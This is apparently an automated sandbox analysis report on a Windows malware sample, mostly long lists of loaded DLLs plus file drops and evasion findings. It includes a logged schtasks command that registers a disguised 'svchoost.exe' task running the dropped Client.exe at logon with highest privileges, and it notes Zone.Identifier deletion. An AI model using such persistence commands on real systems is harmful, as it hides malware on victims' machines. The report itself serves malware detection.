Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
Source:	Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb/ source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76ACA99 push rbx; iretd	0_2_00007FF7E76ACA9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B99D2A5 pushad ; iretd	17_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9BB87BFC push esp; iretd	17_2_00007FFD9BB87BFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD9B9BD2A5 pushad ; iretd	21_2_00007FFD9B9BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD9BBA3821 pushad ; iretd	21_2_00007FFD9BBA3841
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFD9BBA5112 pushad ; retf	21_2_00007FFD9BBA5131
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9B98D2A5 pushad ; iretd	27_2_00007FFD9B98D2A6
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9B98FBB5 pushfd ; iretd	27_2_00007FFD9B98FBB7
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BAB2BFA pushad ; ret	27_2_00007FFD9BAB2BFC
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BAB2BE1 pushad ; ret	27_2_00007FFD9BAB2BE2
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BAB2BBC pushad ; ret	27_2_00007FFD9BAB2BEC
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BAB1EF2 push ds; ret	27_2_00007FFD9BAB1F32
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BAB1ECC push ds; ret	27_2_00007FFD9BAB1F32
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BD3836E pushad ; retf FFFDh	27_2_00007FFD9BD383ED
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 27_2_00007FFD9BE32321 push edx; retf 5F20h	27_2_00007FFD9BE35A3B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	Jump to dropped file
Source: C:\WCTVN\mmytljldrgl.exe	File created: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	File created: C:\WCTVN\mmytljldrgl.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\WCTVN\mmytljldrgl.exe

Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\WCTVN\mmytljldrgl.exe	File opened: C:\WCTVN\mmytljldrgl.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
